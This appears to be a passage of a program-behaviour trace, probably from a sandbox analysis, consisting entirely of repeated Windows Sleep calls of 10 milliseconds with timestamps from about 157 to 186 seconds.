[0157.392] Sleep (dwMilliseconds=0xa) [0157.438] Sleep (dwMilliseconds=0xa) [0157.552] Sleep (dwMilliseconds=0xa) [0157.616] Sleep (dwMilliseconds=0xa) [0157.676] Sleep (dwMilliseconds=0xa) [0157.718] Sleep (dwMilliseconds=0xa) [0157.756] Sleep (dwMilliseconds=0xa) [0157.812] Sleep (dwMilliseconds=0xa) [0157.840] Sleep (dwMilliseconds=0xa) [0157.856] Sleep (dwMilliseconds=0xa) [0157.869] Sleep (dwMilliseconds=0xa) [0157.883] Sleep (dwMilliseconds=0xa) [0157.896] Sleep (dwMilliseconds=0xa) [0157.923] Sleep (dwMilliseconds=0xa) [0157.990] Sleep (dwMilliseconds=0xa) [0158.099] Sleep (dwMilliseconds=0xa) [0158.159] Sleep (dwMilliseconds=0xa) [0158.197] Sleep (dwMilliseconds=0xa) [0158.238] Sleep (dwMilliseconds=0xa) [0158.276] Sleep (dwMilliseconds=0xa) [0158.315] Sleep (dwMilliseconds=0xa) [0158.341] Sleep (dwMilliseconds=0xa) [0158.354] Sleep (dwMilliseconds=0xa) [0158.372] Sleep (dwMilliseconds=0xa) [0158.390] Sleep (dwMilliseconds=0xa) [0158.402] Sleep (dwMilliseconds=0xa) [0158.415] Sleep (dwMilliseconds=0xa) [0158.438] Sleep (dwMilliseconds=0xa) [0158.508] Sleep (dwMilliseconds=0xa) [0158.583] Sleep (dwMilliseconds=0xa) [0158.667] Sleep (dwMilliseconds=0xa) [0158.748] Sleep (dwMilliseconds=0xa) [0158.787] Sleep (dwMilliseconds=0xa) [0158.826] Sleep (dwMilliseconds=0xa) [0159.009] Sleep (dwMilliseconds=0xa) [0159.029] Sleep (dwMilliseconds=0xa) [0159.051] Sleep (dwMilliseconds=0xa) [0159.066] Sleep (dwMilliseconds=0xa) [0159.079] Sleep (dwMilliseconds=0xa) [0159.105] Sleep (dwMilliseconds=0xa) [0159.187] Sleep (dwMilliseconds=0xa) [0159.281] Sleep (dwMilliseconds=0xa) [0159.381] Sleep (dwMilliseconds=0xa) [0159.452] Sleep (dwMilliseconds=0xa) [0159.491] Sleep (dwMilliseconds=0xa) [0159.529] Sleep (dwMilliseconds=0xa) [0159.569] Sleep (dwMilliseconds=0xa) [0159.603] Sleep (dwMilliseconds=0xa) [0159.615] Sleep (dwMilliseconds=0xa) [0159.628] Sleep (dwMilliseconds=0xa) [0159.639] Sleep (dwMilliseconds=0xa) [0159.652] Sleep (dwMilliseconds=0xa) [0159.663] Sleep (dwMilliseconds=0xa) [0159.675] Sleep (dwMilliseconds=0xa) [0159.945] Sleep (dwMilliseconds=0xa) [0160.022] Sleep (dwMilliseconds=0xa) [0160.411] Sleep (dwMilliseconds=0xa) [0160.456] Sleep (dwMilliseconds=0xa) [0160.495] Sleep (dwMilliseconds=0xa) [0160.534] Sleep (dwMilliseconds=0xa) [0160.572] Sleep (dwMilliseconds=0xa) [0160.608] Sleep (dwMilliseconds=0xa) [0160.620] Sleep (dwMilliseconds=0xa) [0160.644] Sleep (dwMilliseconds=0xa) [0160.682] Sleep (dwMilliseconds=0xa) [0160.720] Sleep (dwMilliseconds=0xa) [0160.801] Sleep (dwMilliseconds=0xa) [0160.864] Sleep (dwMilliseconds=0xa) [0160.905] Sleep (dwMilliseconds=0xa) [0160.960] Sleep (dwMilliseconds=0xa) [0160.998] Sleep (dwMilliseconds=0xa) [0161.039] Sleep (dwMilliseconds=0xa) [0161.082] Sleep (dwMilliseconds=0xa) [0161.094] Sleep (dwMilliseconds=0xa) [0161.139] Sleep (dwMilliseconds=0xa) [0161.150] Sleep (dwMilliseconds=0xa) [0161.169] Sleep (dwMilliseconds=0xa) [0161.185] Sleep (dwMilliseconds=0xa) [0161.305] Sleep (dwMilliseconds=0xa) [0161.347] Sleep (dwMilliseconds=0xa) [0161.437] Sleep (dwMilliseconds=0xa) [0161.532] Sleep (dwMilliseconds=0xa) [0161.592] Sleep (dwMilliseconds=0xa) [0161.645] Sleep (dwMilliseconds=0xa) [0161.668] Sleep (dwMilliseconds=0xa) [0161.679] Sleep (dwMilliseconds=0xa) [0161.692] Sleep (dwMilliseconds=0xa) [0161.706] Sleep (dwMilliseconds=0xa) [0161.752] Sleep (dwMilliseconds=0xa) [0161.792] Sleep (dwMilliseconds=0xa) [0161.884] Sleep (dwMilliseconds=0xa) [0161.938] Sleep (dwMilliseconds=0xa) [0161.978] Sleep (dwMilliseconds=0xa) [0162.017] Sleep (dwMilliseconds=0xa) [0162.055] Sleep (dwMilliseconds=0xa) [0162.096] Sleep (dwMilliseconds=0xa) [0162.138] Sleep (dwMilliseconds=0xa) [0162.166] Sleep (dwMilliseconds=0xa) [0162.185] Sleep (dwMilliseconds=0xa) [0162.210] Sleep (dwMilliseconds=0xa) [0162.222] Sleep (dwMilliseconds=0xa) [0162.234] Sleep (dwMilliseconds=0xa) [0162.248] Sleep (dwMilliseconds=0xa) [0162.261] Sleep (dwMilliseconds=0xa) [0162.308] Sleep (dwMilliseconds=0xa) [0162.389] Sleep (dwMilliseconds=0xa) [0162.491] Sleep (dwMilliseconds=0xa) [0162.587] Sleep (dwMilliseconds=0xa) [0162.628] Sleep (dwMilliseconds=0xa) [0162.670] Sleep (dwMilliseconds=0xa) [0162.707] Sleep (dwMilliseconds=0xa) [0162.719] Sleep (dwMilliseconds=0xa) [0162.733] Sleep (dwMilliseconds=0xa) [0162.749] Sleep (dwMilliseconds=0xa) [0162.761] Sleep (dwMilliseconds=0xa) [0162.793] Sleep (dwMilliseconds=0xa) [0162.914] Sleep (dwMilliseconds=0xa) [0163.035] Sleep (dwMilliseconds=0xa) [0163.108] Sleep (dwMilliseconds=0xa) [0163.148] Sleep (dwMilliseconds=0xa) [0163.192] Sleep (dwMilliseconds=0xa) [0163.272] Sleep (dwMilliseconds=0xa) [0163.293] Sleep (dwMilliseconds=0xa) [0163.305] Sleep (dwMilliseconds=0xa) [0163.316] Sleep (dwMilliseconds=0xa) [0163.335] Sleep (dwMilliseconds=0xa) [0163.346] Sleep (dwMilliseconds=0xa) [0163.394] Sleep (dwMilliseconds=0xa) [0163.502] Sleep (dwMilliseconds=0xa) [0163.583] Sleep (dwMilliseconds=0xa) [0163.622] Sleep (dwMilliseconds=0xa) [0163.749] Sleep (dwMilliseconds=0xa) [0163.789] Sleep (dwMilliseconds=0xa) [0163.829] Sleep (dwMilliseconds=0xa) [0163.869] Sleep (dwMilliseconds=0xa) [0163.882] Sleep (dwMilliseconds=0xa) [0163.895] Sleep (dwMilliseconds=0xa) [0163.907] Sleep (dwMilliseconds=0xa) [0163.943] Sleep (dwMilliseconds=0xa) [0163.984] Sleep (dwMilliseconds=0xa) [0164.061] Sleep (dwMilliseconds=0xa) [0164.145] Sleep (dwMilliseconds=0xa) [0164.255] Sleep (dwMilliseconds=0xa) [0164.297] Sleep (dwMilliseconds=0xa) [0164.336] Sleep (dwMilliseconds=0xa) [0164.378] Sleep (dwMilliseconds=0xa) [0164.418] Sleep (dwMilliseconds=0xa) [0164.443] Sleep (dwMilliseconds=0xa) [0164.456] Sleep (dwMilliseconds=0xa) [0164.470] Sleep (dwMilliseconds=0xa) [0164.486] Sleep (dwMilliseconds=0xa) [0164.499] Sleep (dwMilliseconds=0xa) [0164.522] Sleep (dwMilliseconds=0xa) [0164.555] Sleep (dwMilliseconds=0xa) [0164.629] Sleep (dwMilliseconds=0xa) [0164.704] Sleep (dwMilliseconds=0xa) [0164.782] Sleep (dwMilliseconds=0xa) [0164.828] Sleep (dwMilliseconds=0xa) [0164.957] Sleep (dwMilliseconds=0xa) [0165.009] Sleep (dwMilliseconds=0xa) [0165.047] Sleep (dwMilliseconds=0xa) [0165.066] Sleep (dwMilliseconds=0xa) [0165.078] Sleep (dwMilliseconds=0xa) [0165.089] Sleep (dwMilliseconds=0xa) [0165.104] Sleep (dwMilliseconds=0xa) [0165.162] Sleep (dwMilliseconds=0xa) [0165.292] Sleep (dwMilliseconds=0xa) [0165.365] Sleep (dwMilliseconds=0xa) [0165.403] Sleep (dwMilliseconds=0xa) [0165.442] Sleep (dwMilliseconds=0xa) [0165.485] Sleep (dwMilliseconds=0xa) [0165.532] Sleep (dwMilliseconds=0xa) [0165.543] Sleep (dwMilliseconds=0xa) [0165.558] Sleep (dwMilliseconds=0xa) [0165.570] Sleep (dwMilliseconds=0xa) [0165.583] Sleep (dwMilliseconds=0xa) [0165.599] Sleep (dwMilliseconds=0xa) [0165.619] Sleep (dwMilliseconds=0xa) [0165.769] Sleep (dwMilliseconds=0xa) [0165.844] Sleep (dwMilliseconds=0xa) [0165.886] Sleep (dwMilliseconds=0xa) [0165.934] Sleep (dwMilliseconds=0xa) [0165.973] Sleep (dwMilliseconds=0xa) [0166.014] Sleep (dwMilliseconds=0xa) [0166.076] Sleep (dwMilliseconds=0xa) [0166.102] Sleep (dwMilliseconds=0xa) [0166.117] Sleep (dwMilliseconds=0xa) [0166.130] Sleep (dwMilliseconds=0xa) [0166.151] Sleep (dwMilliseconds=0xa) [0166.182] Sleep (dwMilliseconds=0xa) [0166.274] Sleep (dwMilliseconds=0xa) [0166.351] Sleep (dwMilliseconds=0xa) [0166.424] Sleep (dwMilliseconds=0xa) [0166.471] Sleep (dwMilliseconds=0xa) [0166.513] Sleep (dwMilliseconds=0xa) [0166.551] Sleep (dwMilliseconds=0xa) [0166.587] Sleep (dwMilliseconds=0xa) [0166.599] Sleep (dwMilliseconds=0xa) [0166.610] Sleep (dwMilliseconds=0xa) [0166.622] Sleep (dwMilliseconds=0xa) [0166.643] Sleep (dwMilliseconds=0xa) [0166.661] Sleep (dwMilliseconds=0xa) [0166.708] Sleep (dwMilliseconds=0xa) [0166.814] Sleep (dwMilliseconds=0xa) [0166.853] Sleep (dwMilliseconds=0xa) [0166.898] Sleep (dwMilliseconds=0xa) [0166.950] Sleep (dwMilliseconds=0xa) [0166.992] Sleep (dwMilliseconds=0xa) [0167.033] Sleep (dwMilliseconds=0xa) [0167.069] Sleep (dwMilliseconds=0xa) [0167.081] Sleep (dwMilliseconds=0xa) [0167.096] Sleep (dwMilliseconds=0xa) [0167.116] Sleep (dwMilliseconds=0xa) [0167.161] Sleep (dwMilliseconds=0xa) [0167.301] Sleep (dwMilliseconds=0xa) [0167.344] Sleep (dwMilliseconds=0xa) [0167.385] Sleep (dwMilliseconds=0xa) [0167.425] Sleep (dwMilliseconds=0xa) [0167.465] Sleep (dwMilliseconds=0xa) [0167.505] Sleep (dwMilliseconds=0xa) [0167.521] Sleep (dwMilliseconds=0xa) [0167.534] Sleep (dwMilliseconds=0xa) [0167.546] Sleep (dwMilliseconds=0xa) [0167.561] Sleep (dwMilliseconds=0xa) [0167.581] Sleep (dwMilliseconds=0xa) [0167.595] Sleep (dwMilliseconds=0xa) [0167.616] Sleep (dwMilliseconds=0xa) [0167.656] Sleep (dwMilliseconds=0xa) [0167.699] Sleep (dwMilliseconds=0xa) [0167.800] Sleep (dwMilliseconds=0xa) [0167.878] Sleep (dwMilliseconds=0xa) [0167.984] Sleep (dwMilliseconds=0xa) [0168.076] Sleep (dwMilliseconds=0xa) [0168.156] Sleep (dwMilliseconds=0xa) [0168.177] Sleep (dwMilliseconds=0xa) [0168.190] Sleep (dwMilliseconds=0xa) [0168.216] Sleep (dwMilliseconds=0xa) [0168.238] Sleep (dwMilliseconds=0xa) [0168.254] Sleep (dwMilliseconds=0xa) [0168.298] Sleep (dwMilliseconds=0xa) [0168.376] Sleep (dwMilliseconds=0xa) [0168.454] Sleep (dwMilliseconds=0xa) [0168.604] Sleep (dwMilliseconds=0xa) [0168.645] Sleep (dwMilliseconds=0xa) [0168.682] Sleep (dwMilliseconds=0xa) [0168.723] Sleep (dwMilliseconds=0xa) [0168.763] Sleep (dwMilliseconds=0xa) [0168.788] Sleep (dwMilliseconds=0xa) [0168.810] Sleep (dwMilliseconds=0xa) [0168.826] Sleep (dwMilliseconds=0xa) [0168.849] Sleep (dwMilliseconds=0xa) [0168.860] Sleep (dwMilliseconds=0xa) [0168.884] Sleep (dwMilliseconds=0xa) [0168.973] Sleep (dwMilliseconds=0xa) [0169.050] Sleep (dwMilliseconds=0xa) [0169.129] Sleep (dwMilliseconds=0xa) [0169.250] Sleep (dwMilliseconds=0xa) [0169.342] Sleep (dwMilliseconds=0xa) [0169.397] Sleep (dwMilliseconds=0xa) [0169.437] Sleep (dwMilliseconds=0xa) [0169.478] Sleep (dwMilliseconds=0xa) [0169.497] Sleep (dwMilliseconds=0xa) [0169.509] Sleep (dwMilliseconds=0xa) [0169.529] Sleep (dwMilliseconds=0xa) [0169.545] Sleep (dwMilliseconds=0xa) [0169.561] Sleep (dwMilliseconds=0xa) [0169.594] Sleep (dwMilliseconds=0xa) [0169.673] Sleep (dwMilliseconds=0xa) [0169.860] Sleep (dwMilliseconds=0xa) [0169.959] Sleep (dwMilliseconds=0xa) [0170.042] Sleep (dwMilliseconds=0xa) [0170.086] Sleep (dwMilliseconds=0xa) [0170.123] Sleep (dwMilliseconds=0xa) [0170.166] Sleep (dwMilliseconds=0xa) [0170.226] Sleep (dwMilliseconds=0xa) [0170.239] Sleep (dwMilliseconds=0xa) [0170.253] Sleep (dwMilliseconds=0xa) [0170.297] Sleep (dwMilliseconds=0xa) [0170.338] Sleep (dwMilliseconds=0xa) [0170.400] Sleep (dwMilliseconds=0xa) [0170.467] Sleep (dwMilliseconds=0xa) [0170.536] Sleep (dwMilliseconds=0xa) [0170.578] Sleep (dwMilliseconds=0xa) [0170.618] Sleep (dwMilliseconds=0xa) [0170.656] Sleep (dwMilliseconds=0xa) [0170.684] Sleep (dwMilliseconds=0xa) [0170.695] Sleep (dwMilliseconds=0xa) [0170.710] Sleep (dwMilliseconds=0xa) [0170.753] Sleep (dwMilliseconds=0xa) [0170.797] Sleep (dwMilliseconds=0xa) [0170.885] Sleep (dwMilliseconds=0xa) [0170.999] Sleep (dwMilliseconds=0xa) [0171.041] Sleep (dwMilliseconds=0xa) [0171.084] Sleep (dwMilliseconds=0xa) [0171.128] Sleep (dwMilliseconds=0xa) [0171.173] Sleep (dwMilliseconds=0xa) [0171.238] Sleep (dwMilliseconds=0xa) [0171.253] Sleep (dwMilliseconds=0xa) [0171.272] Sleep (dwMilliseconds=0xa) [0171.286] Sleep (dwMilliseconds=0xa) [0171.297] Sleep (dwMilliseconds=0xa) [0171.310] Sleep (dwMilliseconds=0xa) [0171.359] Sleep (dwMilliseconds=0xa) [0171.437] Sleep (dwMilliseconds=0xa) [0171.573] Sleep (dwMilliseconds=0xa) [0171.638] Sleep (dwMilliseconds=0xa) [0171.678] Sleep (dwMilliseconds=0xa) [0171.720] Sleep (dwMilliseconds=0xa) [0171.765] Sleep (dwMilliseconds=0xa) [0171.781] Sleep (dwMilliseconds=0xa) [0171.795] Sleep (dwMilliseconds=0xa) [0171.813] Sleep (dwMilliseconds=0xa) [0171.859] Sleep (dwMilliseconds=0xa) [0171.900] Sleep (dwMilliseconds=0xa) [0172.003] Sleep (dwMilliseconds=0xa) [0172.075] Sleep (dwMilliseconds=0xa) [0172.116] Sleep (dwMilliseconds=0xa) [0172.169] Sleep (dwMilliseconds=0xa) [0172.228] Sleep (dwMilliseconds=0xa) [0172.308] Sleep (dwMilliseconds=0xa) [0172.350] Sleep (dwMilliseconds=0xa) [0172.381] Sleep (dwMilliseconds=0xa) [0172.396] Sleep (dwMilliseconds=0xa) [0172.409] Sleep (dwMilliseconds=0xa) [0172.424] Sleep (dwMilliseconds=0xa) [0172.438] Sleep (dwMilliseconds=0xa) [0172.497] Sleep (dwMilliseconds=0xa) [0172.574] Sleep (dwMilliseconds=0xa) [0172.668] Sleep (dwMilliseconds=0xa) [0172.747] Sleep (dwMilliseconds=0xa) [0172.786] Sleep (dwMilliseconds=0xa) [0172.827] Sleep (dwMilliseconds=0xa) [0172.865] Sleep (dwMilliseconds=0xa) [0172.904] Sleep (dwMilliseconds=0xa) [0172.921] Sleep (dwMilliseconds=0xa) [0172.944] Sleep (dwMilliseconds=0xa) [0172.959] Sleep (dwMilliseconds=0xa) [0172.973] Sleep (dwMilliseconds=0xa) [0172.984] Sleep (dwMilliseconds=0xa) [0172.996] Sleep (dwMilliseconds=0xa) [0173.025] Sleep (dwMilliseconds=0xa) [0173.107] Sleep (dwMilliseconds=0xa) [0173.186] Sleep (dwMilliseconds=0xa) [0173.343] Sleep (dwMilliseconds=0xa) [0173.422] Sleep (dwMilliseconds=0xa) [0173.467] Sleep (dwMilliseconds=0xa) [0173.509] Sleep (dwMilliseconds=0xa) [0173.555] Sleep (dwMilliseconds=0xa) [0173.576] Sleep (dwMilliseconds=0xa) [0173.589] Sleep (dwMilliseconds=0xa) [0173.600] Sleep (dwMilliseconds=0xa) [0173.620] Sleep (dwMilliseconds=0xa) [0173.637] Sleep (dwMilliseconds=0xa) [0173.698] Sleep (dwMilliseconds=0xa) [0173.775] Sleep (dwMilliseconds=0xa) [0173.838] Sleep (dwMilliseconds=0xa) [0173.959] Sleep (dwMilliseconds=0xa) [0174.006] Sleep (dwMilliseconds=0xa) [0174.047] Sleep (dwMilliseconds=0xa) [0174.087] Sleep (dwMilliseconds=0xa) [0174.130] Sleep (dwMilliseconds=0xa) [0174.177] Sleep (dwMilliseconds=0xa) [0174.192] Sleep (dwMilliseconds=0xa) [0174.226] Sleep (dwMilliseconds=0xa) [0174.240] Sleep (dwMilliseconds=0xa) [0174.254] Sleep (dwMilliseconds=0xa) [0174.266] Sleep (dwMilliseconds=0xa) [0174.312] Sleep (dwMilliseconds=0xa) [0174.390] Sleep (dwMilliseconds=0xa) [0174.502] Sleep (dwMilliseconds=0xa) [0174.575] Sleep (dwMilliseconds=0xa) [0174.615] Sleep (dwMilliseconds=0xa) [0174.658] Sleep (dwMilliseconds=0xa) [0174.702] Sleep (dwMilliseconds=0xa) [0174.742] Sleep (dwMilliseconds=0xa) [0174.769] Sleep (dwMilliseconds=0xa) [0174.781] Sleep (dwMilliseconds=0xa) [0174.794] Sleep (dwMilliseconds=0xa) [0174.812] Sleep (dwMilliseconds=0xa) [0174.836] Sleep (dwMilliseconds=0xa) [0174.876] Sleep (dwMilliseconds=0xa) [0174.960] Sleep (dwMilliseconds=0xa) [0175.003] Sleep (dwMilliseconds=0xa) [0175.082] Sleep (dwMilliseconds=0xa) [0175.145] Sleep (dwMilliseconds=0xa) [0175.217] Sleep (dwMilliseconds=0xa) [0175.259] Sleep (dwMilliseconds=0xa) [0175.291] Sleep (dwMilliseconds=0xa) [0175.302] Sleep (dwMilliseconds=0xa) [0175.323] Sleep (dwMilliseconds=0xa) [0175.368] Sleep (dwMilliseconds=0xa) [0175.409] Sleep (dwMilliseconds=0xa) [0175.505] Sleep (dwMilliseconds=0xa) [0175.584] Sleep (dwMilliseconds=0xa) [0175.629] Sleep (dwMilliseconds=0xa) [0175.725] Sleep (dwMilliseconds=0xa) [0175.767] Sleep (dwMilliseconds=0xa) [0175.807] Sleep (dwMilliseconds=0xa) [0175.846] Sleep (dwMilliseconds=0xa) [0175.882] Sleep (dwMilliseconds=0xa) [0175.899] Sleep (dwMilliseconds=0xa) [0175.943] Sleep (dwMilliseconds=0xa) [0175.966] Sleep (dwMilliseconds=0xa) [0176.000] Sleep (dwMilliseconds=0xa) [0176.076] Sleep (dwMilliseconds=0xa) [0176.180] Sleep (dwMilliseconds=0xa) [0176.291] Sleep (dwMilliseconds=0xa) [0176.334] Sleep (dwMilliseconds=0xa) [0176.375] Sleep (dwMilliseconds=0xa) [0176.416] Sleep (dwMilliseconds=0xa) [0176.460] Sleep (dwMilliseconds=0xa) [0176.490] Sleep (dwMilliseconds=0xa) [0176.504] Sleep (dwMilliseconds=0xa) [0176.517] Sleep (dwMilliseconds=0xa) [0176.536] Sleep (dwMilliseconds=0xa) [0176.560] Sleep (dwMilliseconds=0xa) [0176.595] Sleep (dwMilliseconds=0xa) [0176.667] Sleep (dwMilliseconds=0xa) [0176.809] Sleep (dwMilliseconds=0xa) [0176.948] Sleep (dwMilliseconds=0xa) [0177.031] Sleep (dwMilliseconds=0xa) [0177.076] Sleep (dwMilliseconds=0xa) [0177.117] Sleep (dwMilliseconds=0xa) [0177.152] Sleep (dwMilliseconds=0xa) [0177.164] Sleep (dwMilliseconds=0xa) [0177.177] Sleep (dwMilliseconds=0xa) [0177.189] Sleep (dwMilliseconds=0xa) [0177.218] Sleep (dwMilliseconds=0xa) [0177.230] Sleep (dwMilliseconds=0xa) [0177.286] Sleep (dwMilliseconds=0xa) [0177.363] Sleep (dwMilliseconds=0xa) [0177.477] Sleep (dwMilliseconds=0xa) [0177.545] Sleep (dwMilliseconds=0xa) [0177.586] Sleep (dwMilliseconds=0xa) [0177.626] Sleep (dwMilliseconds=0xa) [0177.664] Sleep (dwMilliseconds=0xa) [0177.705] Sleep (dwMilliseconds=0xa) [0177.722] Sleep (dwMilliseconds=0xa) [0177.733] Sleep (dwMilliseconds=0xa) [0177.747] Sleep (dwMilliseconds=0xa) [0177.761] Sleep (dwMilliseconds=0xa) [0177.782] Sleep (dwMilliseconds=0xa) [0177.793] Sleep (dwMilliseconds=0xa) [0177.841] Sleep (dwMilliseconds=0xa) [0177.918] Sleep (dwMilliseconds=0xa) [0177.983] Sleep (dwMilliseconds=0xa) [0178.168] Sleep (dwMilliseconds=0xa) [0178.321] Sleep (dwMilliseconds=0xa) [0178.368] Sleep (dwMilliseconds=0xa) [0178.407] Sleep (dwMilliseconds=0xa) [0178.433] Sleep (dwMilliseconds=0xa) [0178.446] Sleep (dwMilliseconds=0xa) [0178.459] Sleep (dwMilliseconds=0xa) [0178.472] Sleep (dwMilliseconds=0xa) [0178.491] Sleep (dwMilliseconds=0xa) [0178.532] Sleep (dwMilliseconds=0xa) [0178.623] Sleep (dwMilliseconds=0xa) [0178.689] Sleep (dwMilliseconds=0xa) [0178.729] Sleep (dwMilliseconds=0xa) [0178.769] Sleep (dwMilliseconds=0xa) [0178.814] Sleep (dwMilliseconds=0xa) [0178.854] Sleep (dwMilliseconds=0xa) [0178.876] Sleep (dwMilliseconds=0xa) [0178.897] Sleep (dwMilliseconds=0xa) [0178.911] Sleep (dwMilliseconds=0xa) [0178.938] Sleep (dwMilliseconds=0xa) [0178.949] Sleep (dwMilliseconds=0xa) [0178.995] Sleep (dwMilliseconds=0xa) [0179.082] Sleep (dwMilliseconds=0xa) [0179.189] Sleep (dwMilliseconds=0xa) [0179.338] Sleep (dwMilliseconds=0xa) [0179.383] Sleep (dwMilliseconds=0xa) [0179.424] Sleep (dwMilliseconds=0xa) [0179.465] Sleep (dwMilliseconds=0xa) [0179.498] Sleep (dwMilliseconds=0xa) [0179.510] Sleep (dwMilliseconds=0xa) [0179.526] Sleep (dwMilliseconds=0xa) [0179.541] Sleep (dwMilliseconds=0xa) [0179.555] Sleep (dwMilliseconds=0xa) [0179.579] Sleep (dwMilliseconds=0xa) [0179.608] Sleep (dwMilliseconds=0xa) [0179.684] Sleep (dwMilliseconds=0xa) [0179.779] Sleep (dwMilliseconds=0xa) [0179.872] Sleep (dwMilliseconds=0xa) [0179.911] Sleep (dwMilliseconds=0xa) [0179.957] Sleep (dwMilliseconds=0xa) [0179.994] Sleep (dwMilliseconds=0xa) [0180.034] Sleep (dwMilliseconds=0xa) [0180.046] Sleep (dwMilliseconds=0xa) [0180.088] Sleep (dwMilliseconds=0xa) [0180.106] Sleep (dwMilliseconds=0xa) [0180.123] Sleep (dwMilliseconds=0xa) [0180.207] Sleep (dwMilliseconds=0xa) [0180.250] Sleep (dwMilliseconds=0xa) [0180.290] Sleep (dwMilliseconds=0xa) [0180.333] Sleep (dwMilliseconds=0xa) [0180.377] Sleep (dwMilliseconds=0xa) [0180.511] Sleep (dwMilliseconds=0xa) [0180.556] Sleep (dwMilliseconds=0xa) [0180.569] Sleep (dwMilliseconds=0xa) [0180.583] Sleep (dwMilliseconds=0xa) [0180.597] Sleep (dwMilliseconds=0xa) [0180.610] Sleep (dwMilliseconds=0xa) [0180.621] Sleep (dwMilliseconds=0xa) [0180.652] Sleep (dwMilliseconds=0xa) [0180.734] Sleep (dwMilliseconds=0xa) [0180.829] Sleep (dwMilliseconds=0xa) [0180.944] Sleep (dwMilliseconds=0xa) [0181.048] Sleep (dwMilliseconds=0xa) [0181.096] Sleep (dwMilliseconds=0xa) [0181.139] Sleep (dwMilliseconds=0xa) [0181.179] Sleep (dwMilliseconds=0xa) [0181.223] Sleep (dwMilliseconds=0xa) [0181.274] Sleep (dwMilliseconds=0xa) [0181.287] Sleep (dwMilliseconds=0xa) [0181.337] Sleep (dwMilliseconds=0xa) [0181.384] Sleep (dwMilliseconds=0xa) [0181.575] Sleep (dwMilliseconds=0xa) [0181.671] Sleep (dwMilliseconds=0xa) [0181.725] Sleep (dwMilliseconds=0xa) [0181.795] Sleep (dwMilliseconds=0xa) [0181.837] Sleep (dwMilliseconds=0xa) [0181.877] Sleep (dwMilliseconds=0xa) [0181.954] Sleep (dwMilliseconds=0xa) [0181.994] Sleep (dwMilliseconds=0xa) [0182.015] Sleep (dwMilliseconds=0xa) [0182.028] Sleep (dwMilliseconds=0xa) [0182.040] Sleep (dwMilliseconds=0xa) [0182.068] Sleep (dwMilliseconds=0xa) [0182.163] Sleep (dwMilliseconds=0xa) [0182.240] Sleep (dwMilliseconds=0xa) [0182.369] Sleep (dwMilliseconds=0xa) [0182.447] Sleep (dwMilliseconds=0xa) [0182.489] Sleep (dwMilliseconds=0xa) [0182.531] Sleep (dwMilliseconds=0xa) [0182.575] Sleep (dwMilliseconds=0xa) [0182.614] Sleep (dwMilliseconds=0xa) [0182.640] Sleep (dwMilliseconds=0xa) [0182.653] Sleep (dwMilliseconds=0xa) [0182.666] Sleep (dwMilliseconds=0xa) [0182.679] Sleep (dwMilliseconds=0xa) [0182.702] Sleep (dwMilliseconds=0xa) [0182.738] Sleep (dwMilliseconds=0xa) [0182.815] Sleep (dwMilliseconds=0xa) [0182.900] Sleep (dwMilliseconds=0xa) [0182.955] Sleep (dwMilliseconds=0xa) [0182.996] Sleep (dwMilliseconds=0xa) [0183.039] Sleep (dwMilliseconds=0xa) [0183.083] Sleep (dwMilliseconds=0xa) [0183.130] Sleep (dwMilliseconds=0xa) [0183.152] Sleep (dwMilliseconds=0xa) [0183.165] Sleep (dwMilliseconds=0xa) [0183.178] Sleep (dwMilliseconds=0xa) [0183.193] Sleep (dwMilliseconds=0xa) [0183.204] Sleep (dwMilliseconds=0xa) [0183.219] Sleep (dwMilliseconds=0xa) [0183.232] Sleep (dwMilliseconds=0xa) [0183.261] Sleep (dwMilliseconds=0xa) [0183.354] Sleep (dwMilliseconds=0xa) [0183.448] Sleep (dwMilliseconds=0xa) [0183.517] Sleep (dwMilliseconds=0xa) [0183.558] Sleep (dwMilliseconds=0xa) [0183.599] Sleep (dwMilliseconds=0xa) [0183.646] Sleep (dwMilliseconds=0xa) [0183.678] Sleep (dwMilliseconds=0xa) [0183.692] Sleep (dwMilliseconds=0xa) [0183.707] Sleep (dwMilliseconds=0xa) [0183.718] Sleep (dwMilliseconds=0xa) [0183.740] Sleep (dwMilliseconds=0xa) [0183.768] Sleep (dwMilliseconds=0xa) [0183.842] Sleep (dwMilliseconds=0xa) [0183.940] Sleep (dwMilliseconds=0xa) [0184.109] Sleep (dwMilliseconds=0xa) [0184.171] Sleep (dwMilliseconds=0xa) [0184.214] Sleep (dwMilliseconds=0xa) [0184.252] Sleep (dwMilliseconds=0xa) [0184.292] Sleep (dwMilliseconds=0xa) [0184.332] Sleep (dwMilliseconds=0xa) [0184.369] Sleep (dwMilliseconds=0xa) [0184.383] Sleep (dwMilliseconds=0xa) [0184.395] Sleep (dwMilliseconds=0xa) [0184.418] Sleep (dwMilliseconds=0xa) [0184.468] Sleep (dwMilliseconds=0xa) [0184.512] Sleep (dwMilliseconds=0xa) [0184.556] Sleep (dwMilliseconds=0xa) [0184.593] Sleep (dwMilliseconds=0xa) [0184.631] Sleep (dwMilliseconds=0xa) [0184.672] Sleep (dwMilliseconds=0xa) [0184.709] Sleep (dwMilliseconds=0xa) [0184.724] Sleep (dwMilliseconds=0xa) [0184.748] Sleep (dwMilliseconds=0xa) [0184.777] Sleep (dwMilliseconds=0xa) [0184.817] Sleep (dwMilliseconds=0xa) [0184.946] Sleep (dwMilliseconds=0xa) [0185.026] Sleep (dwMilliseconds=0xa) [0185.070] Sleep (dwMilliseconds=0xa) [0185.112] Sleep (dwMilliseconds=0xa) [0185.187] Sleep (dwMilliseconds=0xa) [0185.235] Sleep (dwMilliseconds=0xa) [0185.278] Sleep (dwMilliseconds=0xa) [0185.292] Sleep (dwMilliseconds=0xa) [0185.304] Sleep (dwMilliseconds=0xa) [0185.316] Sleep (dwMilliseconds=0xa) [0185.330] Sleep (dwMilliseconds=0xa) [0185.362] Sleep (dwMilliseconds=0xa) [0185.376] Sleep (dwMilliseconds=0xa) [0185.388] Sleep (dwMilliseconds=0xa) [0185.432] Sleep (dwMilliseconds=0xa) [0185.474] Sleep (dwMilliseconds=0xa) [0185.514] Sleep (dwMilliseconds=0xa) [0185.575] Sleep (dwMilliseconds=0xa) [0185.614] Sleep (dwMilliseconds=0xa) [0185.651] Sleep (dwMilliseconds=0xa) [0185.685] Sleep (dwMilliseconds=0xa) [0185.709] Sleep (dwMilliseconds=0xa) [0185.744] Sleep (dwMilliseconds=0xa) [0185.782] Sleep (dwMilliseconds=0xa) [0185.884] Sleep (dwMilliseconds=0xa) [0185.977] Sleep (dwMilliseconds=0xa) [0186.025] Sleep (dwMilliseconds=0xa) [0186.062] Sleep (dwMilliseconds=0xa) [0186.099] Sleep (dwMilliseconds=0xa) [0186.140] Sleep (dwMilliseconds=0xa) [0186.184] Sleep (dwMilliseconds=0xa) [0186.202] Sleep 